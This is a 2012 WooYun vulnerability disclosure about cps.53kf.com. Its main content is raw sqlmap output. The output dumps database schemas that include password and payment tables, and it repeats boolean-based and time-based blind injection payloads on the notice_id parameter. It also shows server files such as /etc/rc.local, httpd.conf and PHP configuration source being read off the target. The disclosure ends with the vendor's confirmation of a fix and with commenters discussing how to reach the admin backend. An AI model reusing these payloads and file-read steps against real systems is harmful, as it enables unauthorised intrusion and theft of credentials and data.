| logo | varchar(25) |
| method | tinyint(1) |
| method_nnet | tinyint(1) |
| name | varchar(255) |
| net_reg | tinyint(1) |
| notes | text |
| online | bigint(20) |
| order_flag | tinyint(1) |
| paim | float |
| phone | varchar(40) |
| province | varchar(50) |
| proxy | varchar(50) |
| qq | varchar(50) |
| real_proxy | varchar(50) |
| reg_from | varchar(4) |
| search | varchar(255) |
| sell_name | varchar(20) |
| sell_stat | tinyint(2) |
| short_name | varchar(255) |
| show_flag | tinyint(2) |
| t_date | float(10,2) |
| t_today | date |
| t_total | float(10,2) |
| talk_area | varchar(150) |
| talk_etime | tinyint(10) |
| talk_stime | tinyint(10) |
| talk_url | varchar(100) |
| url | varchar(50) |
| vip_order | int(11) |
+---------------------+------------------+
Database: v5
Table: v5_agent_bill
[8 columns]
+----------+---------------------+
| Column | Type |
+----------+---------------------+
| agent_id | int(11) |
| balance | float(7,2) unsigned |
| id | int(10) unsigned |
| io_time | datetime |
| io_type | int(10) unsigned |
| money | float unsigned |
| orderid | varchar(20) |
| reason | text |
+----------+---------------------+
Database: v5
Table: v5_company_bill
[13 columns]
+-------------+------------------+
| Column | Type |
+-------------+------------------+
| company_id | int(20) |
| date | datetime |
| id | int(20) unsigned |
| ip | varchar(50) |
| istalk | tinyint(1) |
| money | float(7,2) |
| old_comid | bigint(20) |
| orderid | varchar(20) |
| pay_way | varchar(20) |
| person_name | varchar(100) |
| remark | text |
| src | varchar(20) |
| type | tinyint(2) |
+-------------+------------------+
Database: v5
Table: gggj_ad
[15 columns]
+-------------+-------------------+
| Column | Type |
+-------------+-------------------+
| ad_code | text |
| ad_content | varchar(50) |
| ad_name | varchar(50) |
| ad_price | float |
| ad_url | text |
| add_time | datetime |
| audit | enum('Y','N','X') |
| commits | varchar(10) |
| end_time | date |
| id | int(11) |
| master_name | varchar(20) |
| money_type | tinyint(2) |
| order_by | varchar(5) |
| show_type | varchar(1) |
| start_time | date |
+-------------+-------------------+
Database: v5
Table: web_user_url
[8 columns]
+---------------------+--------------+
| Column | Type |
+---------------------+--------------+
| baidu_date | date |
| baidu_record | varchar(20) |
| id | int(10) |
| is_first | tinyint(3) |
| pr | tinyint(2) |
| url | varchar(256) |
| user_name | varchar(20) |
| web_ad_out_links_id | int(10) |
+---------------------+--------------+
Database: v5
Table: ad_count
[6 columns]
+-----------+-------------+
| Column | Type |
+-----------+-------------+
| ad_date | date |
| ad_id | int(11) |
| ad_ip_num | int(10) |
| ad_num | int(10) |
| ad_type | varchar(50) |
| id | int(11) |
+-----------+-------------+
Database: v5
Table: v5_worker
[6 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| company_id | int(11) |
| id | int(11) |
| is_admin | tinyint(4) |
| name | varchar(100) |
| passwd | varchar(40) |
| worker_id | varchar(20) |
+------------+--------------+
Database: v5
Table: gggj_ad_old
[13 columns]
+-------------+-------------------+
| Column | Type |
+-------------+-------------------+
| ad_code | text |
| ad_content | varchar(50) |
| ad_name | varchar(50) |
| ad_price | float |
| ad_url | text |
| add_time | date |
| audit | enum('Y','N','X') |
| commits | varchar(10) |
| end_time | date |
| id | int(11) |
| master_name | varchar(11) |
| money_type | tinyint(2) |
| start_time | date |
+-------------+-------------------+
Database: v5
Table: v5_agent_oper
[30 columns]
+----------------+---------------------+
| Column | Type |
+----------------+---------------------+
| active_money | float(10,2) |
| addr | varchar(150) |
| city | varchar(20) |
| city_center | tinyint(3) unsigned |
| city_discount | float unsigned |
| city_name | varchar(30) |
| discount | float unsigned |
| email | varchar(100) |
| fix_money | float(10,2) |
| id | int(10) unsigned |
| is_zongdai | tinyint(3) unsigned |
| kf_name | int(8) |
| money | float(10,2) |
| msg | tinyint(3) unsigned |
| name | varchar(50) |
| new_add_money | float(10,2) |
| new_add_month | varchar(7) |
| oper_name | varchar(20) |
| oper_pwd | varchar(50) |
| pass | tinyint(3) unsigned |
| phone | varchar(50) |
| receipt_money | float(10,2) |
| reg_date | datetime |
| see_agent_user | tinyint(3) |
| style_lock | tinyint(3) unsigned |
| tm | varchar(50) |
| type | tinyint(3) unsigned |
| zdygg | tinyint(3) unsigned |
| zdylogo | tinyint(3) unsigned |
| zongdai_id | int(10) unsigned |
+----------------+---------------------+
Database: v5
Table: gggj_adstat
[6 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| ad_from | tinyint(2) |
| ad_id | int(11) |
| ad_time | datetime |
| com_area | varchar(100) |
| com_ip | varchar(20) |
| domain_name | varchar(20) |
+-------------+--------------+
Database: v5
Table: v5_company_talk_log
[5 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| company_id | int(10) |
| id | int(10) |
| talk_date | datetime |
| talk_ip | varchar(15) |
| talk_url | varchar(100) |
+------------+--------------+
Database: v5
Table: gggj_accountHistory
[6 columns]
+-------------+-------------+
| Column | Type |
+-------------+-------------+
| account | varchar(40) |
| add_person | varchar(11) |
| add_time | datetime |
| domain_name | varchar(50) |
| id | int(11) |
| moneNum | char(10) |
+-------------+-------------+
Database: v5
Table: gggj_account
[8 columns]
+----------------+---------------+
| Column | Type |
+----------------+---------------+
| account | varchar(50) |
| account_from | varchar(20) |
| account_person | varchar(11) |
| account_type | char(10) |
| add_time | datetime |
| domain_name | varchar(50) |
| id | int(11) |
| is_select | enum('Y','N') |
+----------------+---------------+
Database: v5
Table: out_links
[7 columns]
+-------------+---------------+
| Column | Type |
+-------------+---------------+
| ad_user | varchar(25) |
| add_time | datetime |
| anchor_text | varchar(128) |
| id | int(10) |
| pr | tinyint(2) |
| web_type | enum('0','1') |
| web_url | varchar(50) |
+-------------+---------------+
Database: v5
Table: user_infor
[17 columns]
+--------------+------------------+
| Column | Type |
+--------------+------------------+
| baidu_date | date |
| baidu_record | varchar(20) |
| com_name | varchar(128) |
| connect | varchar(40) |
| email | varchar(50) |
| gm_sum | int(10) |
| id | int(20) unsigned |
| money | int(10) |
| password | varchar(50) |
| phone | varchar(20) |
| pr | tinyint(2) |
| qq | varchar(20) |
| reg_sum | int(10) |
| type | varchar(2) |
| user_level | tinyint(2) |
| user_name | varchar(20) |
| website | varchar(50) |
+--------------+------------------+
Database: v5
Table: cps_commission_log
[8 columns]
+----------------+------------------+
| Column | Type |
+----------------+------------------+
| add_time | datetime |
| company_id | int(10) unsigned |
| cps_account | varchar(20) |
| domain_name | varchar(20) |
| id | int(20) |
| money | decimal(10,2) |
| recharge_money | decimal(10,2) |
| remark | varchar(150) |
+----------------+------------------+
Database: v5
Table: user_infor_xx
[4 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| add_date | datetime |
| id | int(20) |
| user_id | int(20) |
| xx_name | varchar(20) |
+----------+-------------+
Database: v5
Table: ad_show
[4 columns]
+---------+---------+
| Column | Type |
+---------+---------+
| ad_dbgg | int(20) |
| ad_logo | int(20) |
| ad_time | date |
| id | int(20) |
+---------+---------+
Database: v5
Table: web_ad_out_links
[11 columns]
+-----------------+-------------------+
| Column | Type |
+-----------------+-------------------+
| add_time | datetime |
| delete_by | enum('2','1','0') |
| delete_time | datetime |
| end_time | datetime |
| id | int(10) |
| money_clearing | datetime |
| out_links_id | varchar(10) |
| start_time | datetime |
| status | enum('0','1','2') |
| web_user | varchar(25) |
| web_user_url_id | int(10) |
+-----------------+-------------------+
Database: v5
Table: sendemail_record
[10 columns]
+----------+------------------------------+
| Column | Type |
+----------+------------------------------+
| addtime | int(11) |
| content | varchar(225) |
| endtime | int(11) |
| mail_id | int(11) |
| receiver | varchar(225) |
| report | text |
| sendtime | int(11) |
| status | enum('wait','sending','end') |
| title | varchar(225) |
| type | enum('1','2','3') |
+----------+------------------------------+
Database: v5
Table: mailqueue
[9 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| charset | char(4) |
| content | mediumtext |
| from1 | varchar(100) |
| fromname | varchar(255) |
| id | int(11) |
| reply | varchar(100) |
| status | tinyint(4) |
| subject | varchar(255) |
| to1 | varchar(255) |
+----------+--------------+
Database: v5
Table: gggj_master_user
[13 columns]
+----------+---------------+
| Column | Type |
+----------+---------------+
| com_name | varchar(100) |
| gg_type | varchar(20) |
| id | int(50) |
| is_proxy | enum('N','Y') |
| mail | varchar(20) |
| mobile | varchar(20) |
| name | varchar(10) |
| pass | char(50) |
| person | varchar(20) |
| phone | varchar(20) |
| remark | text |
| type | char(10) |
| url | varchar(100) |
+----------+---------------+
Database: v5
Table: gggj_config
[3 columns]
+--------------+-------------+
| Column | Type |
+--------------+-------------+
| config_id | varchar(20) |
| config_value | text |
| domain_name | varchar(50) |
+--------------+-------------+
Database: v5
Table: id_record
[3 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| id | int(20) |
| last_date | datetime |
| last_id | int(10) |
+-----------+----------+
Database: v5
Table: v5_company_config
[3 columns]
+--------------+-------------+
| Column | Type |
+--------------+-------------+
| company_id | int(11) |
| config_id | varchar(20) |
| config_value | text |
+--------------+-------------+
Database: v5
Table: conf_ip1
[6 columns]
+----------+---------------------+
| Column | Type |
+----------+---------------------+
| area | char(30) |
| city | char(30) |
| city_cn | char(30) |
| end_ip | bigint(20) unsigned |
| isp | char(30) |
| start_ip | bigint(20) unsigned |
+----------+---------------------+
Database: v5
Table: gggj_require
[10 columns]
+--------------+---------------+
| Column | Type |
+--------------+---------------+
| add_date | datetime |
| add_fujian | varchar(255) |
| add_solution | text |
| add_user | int(10) |
| audit | enum('Y','N') |
| audit_day | datetime |
| content | text |
| id | int(10) |
| master_name | varchar(25) |
| title | varchar(50) |
+--------------+---------------+
Database: v5
Table: official_adstat
[6 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| ad_from | tinyint(2) |
| ad_id | int(11) |
| ad_time | datetime |
| com_area | varchar(100) |
| com_ip | varchar(20) |
| domain_name | varchar(20) |
+-------------+--------------+
Database: v5
Table: kf_tuo
[8 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| ad_id | int(10) |
| ad_type | varchar(10) |
| area | varchar(100) |
| come_date | datetime |
| come_ip | varchar(20) |
| come_url | varchar(250) |
| id | int(10) |
| user_id | int(10) |
+-----------+--------------+
Database: v5
Table: ad_show_js
[4 columns]
+---------+---------+
| Column | Type |
+---------+---------+
| ad_dbgg | int(20) |
| ad_logo | int(20) |
| ad_time | date |
| id | int(20) |
+---------+---------+
Database: v5
Table: cps_user
[13 columns]
+-------------------+--------------+
| Column | Type |
+-------------------+--------------+
| balance | float(10,2) |
| cash_frozen_money | float(10,2) |
| company_url | varchar(50) |
| contact_name | varchar(50) |
| cust_id | varchar(20) |
| id | int(20) |
| is_checked | tinyint(2) |
| is_verified | tinyint(2) |
| mobile | varchar(11) |
| pwd | varchar(50) |
| qq | varchar(11) |
| reg_num | int(10) |
| user_name | varchar(100) |
+-------------------+--------------+
Database: v5
Table: cps_user_account
[9 columns]
+-------------------+------------------+
| Column | Type |
+-------------------+------------------+
| add_time | datetime |
| balance | float(10,2) |
| cash_frozen_money | float(10,2) |
| cust_id | varchar(20) |
| exact_io_type | int(10) unsigned |
| id | int(20) |
| io_remark | text |
| io_type | tinyint(2) |
| money | float(10,2) |
+-------------------+------------------+
Database: v5
Table: gggj_user_config
[4 columns]
+-------------+-------------+
| Column | Type |
+-------------+-------------+
| ad_id | int(11) |
| ad_order | int(4) |
| ad_pos | int(2) |
| domain_name | varchar(50) |
+-------------+-------------+
Database: v5
Table: gggj_master_type
[2 columns]
+---------+-------------+
| Column | Type |
+---------+-------------+
| gg_type | varchar(10) |
| id | int(10) |
+---------+-------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
/etc/rc.local file saved to: 'C:\Python27\sqlmap\output\cps.53kf.com\files\_etc_rc.local'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
/usr/local/apache2/conf/httpd.conf file saved to: 'C:\Python27\sqlmap\output\cps.53kf.com\files\_usr_local_apache2_conf_httpd.conf'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
/home/adv/www/cps/www/union_notice.php file saved to: 'C:\Python27\sqlmap\output\cps.53kf.com\files\_home_adv_www_cps_www_union_notice.php'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
/home/adv/www/cps/www/include/global.php--threads=10 file saved to: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
/home/adv/www/cps/www/include/global.php file saved to: 'C:\Python27\sqlmap\output\cps.53kf.com\files\_home_adv_www_cps_www_include_global.php'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
/home/adv/www/index.php file saved to: 'C:\Python27\sqlmap\output\cps.53kf.com\files\_home_adv_www_index.php'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
/home/adv/www/cps/www/config/cps_config.php file saved to: None
sqlmap identified the following injection points with a total of 0 HTTP

漏洞证明:


修复方案:

多吃月饼,少看电视,多陪父母,少加班

版权声明:转载请注明来源 clzzy@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-10-10 16:46

厂商回复:

非常感谢漏洞的提交,我们已经修复漏洞。

最新状态:

暂无


漏洞评价:

评论

  1. 2012-09-29 20:48 | krbl ( 实习白帽子 | Rank:97 漏洞数:13 | ♦♠♣♫♪☼☻☺ஐ♥♀♂☆๑۩۞۩๑☜☞...)

    后台..

  2. 2012-09-29 21:49 | 乌帽子 ( 路人 | Rank:29 漏洞数:3 | 学习黑客哪家强 | 中国山东找蓝翔 | sql...)

    反正拿不拿shell估计都是20个Rank....他们后台貌似假后台啊,直接加admin那个

  3. 2012-11-10 04:15 | 0x_Jin ( 普通白帽子 | Rank:319 漏洞数:37 | 微博:http://weibo.com/J1n9999)

    - - 他们的后台。。。 我算是服了 他们的后台管理功能估计是一个后台页面生成的缓存页面进行管理 每次结束会话 那个缓存页面就失效了 因为盲打进去过很多次 每次都说访问的是缓存页面 要我清除cookies 蛋疼了